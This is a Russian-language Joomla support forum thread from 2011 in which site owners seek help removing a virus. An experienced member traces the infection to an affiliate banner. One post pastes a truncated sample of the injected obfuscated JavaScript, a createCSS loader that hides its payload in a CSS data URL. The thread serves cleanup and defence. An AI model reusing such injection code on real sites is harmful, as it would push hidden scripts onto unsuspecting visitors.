Joomla 1.5 Как найти вирус?

Тема в разделе "Сайт умер, лежит и не дышит", создана пользователем Roma90, 11.03.2011.

  1. Offline

    motorhead Недавно здесь

    Регистрация:
    26.03.2011
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    На моем сайте _http://ezoterica-x.ru/ тоже пару недель назад поселился вирус:(
    Перерыл все индексные файлы, не могу его найти. Может кто-нибудь встречался с такой проблемой?
     
  2. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Помогите, как мне от него избавиться!?
     
  3. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
  4. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Roma90,
    посмотри в файле xmlrpc/index.php строку start the service.ну а вообще то-без доступа к файлам,вряд ли можно сказать где вредоносный код.Выложи сюда файл конфиг и индекса шаблона,а еще желательно xml шаблона.
     
  5. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
  6. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Roma90,
    Вопрос-в общих настройках включено-WEB-сервисы?
     
  7. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Нет, а надо!?
     
  8. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Roma90,

    Не нашел ничего,что я знаю.
    В твоём случае-нет.
    п.с.
    Партнёрки ставил?
    адрес-http://freeviral.ru/img/ban46860.gif
    тип-Изображение GIF (анимация, 10 фреймов)
     
    Последнее редактирование: 26.03.2011
  9. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Нашел кое какую информцию о вирусе:
    http://blog.unmaskparasites.com/2011/03/24/blackhole-defs_colors-and-createcss-injections/

    Я так понял что вирус использует функцию createCSS.
    Где еще можно можно поискать вирус!?
     
  10. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Да. Убрать!?
    Ето от них вирус!? =O
     
  11. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    ну да,в исходном коде фрейма-все ссылки bonuses.corkit.co
    Оно того стоило ставить такую дешевую партнёрку?
    Портить такой красивый сайт.
     
  12. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Спасибо большое! [!]
    Будет мне уроком на будущее :)
     
  13. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Roma90,
    что уже удалил?
     
  14. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Удалил баннер. Только оказывается код вируса на всех сылках которые есть на странице :(
    Что мне их всех удалить что-ли!?
     
    Последнее редактирование: 26.03.2011
  15. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    То что банер удалил-так это только картинка.Нужно удалить весь код,который ты вставил с этим банером.
    Кстати посмотрел я твой CSS,и в самом начале то ли ajax ,то ли Хз.
    попробуй вырежь "#va {background:url(data:,String.fromCharCode)}" их там 12строк.
     

    Вложения:

    Последнее редактирование: 26.03.2011
  16. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Тоесть здесь:

    <script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,String.fromCharCode)');var pxwp=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var rxl=r.cssRules||r.rules;for(var uvv=0;uvv<rxl.length;uvv++){var ze=rxl.item?rxl.item(uvv):rxl[uvv];if(!ze.selectorText.match(/#va/))continue;lw=(ze.cssText)?ze.cssText:ze.style.cssText;pxwp=lw.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];iux=ze.selectorText.substr(1);};}catch(e){};}
    gk=new Date(2010,11,3,2,21,4);t=gk.getSeconds();var ywrc=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/.......

    Ето вирус =( Какой мне файл редактировать, я хз!? :(
     
  17. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    Нашел статью - Как удалить вирус с сайта. Удаление iframe из скриптов:
    http://www.ihtiandr.info/web/79-how-to-remove-virus-from-site-scripts.html
    У меня вопрос: что такое ssh-доступ на сервер!? :(
     
  18. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    Roma90,
    index.php шаблона.В каком div/блоке нашел код?
    Да написать можно много чего.Каждый случай уникальный.И тут важна осторожность,чтобы при удалении вредоносного кода из файлов-не поломать,нарушить функциональность самой CMS
     
  19. Offline

    motorhead Недавно здесь

    Регистрация:
    26.03.2011
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской


    У меня точно такой же код, в каком файле вы его нашли? я уже все перерыл.
     
  20. Offline

    Roma90 Пользователь

    Регистрация:
    21.06.2010
    Сообщения:
    56
    Симпатии:
    0
    Пол:
    Мужской
    На главной странице ПКМ -> просмотр кода страницы. А в каком файле. Я сам хз :(
     
    Последнее редактирование: 27.03.2011

Поделиться этой страницей

Загрузка...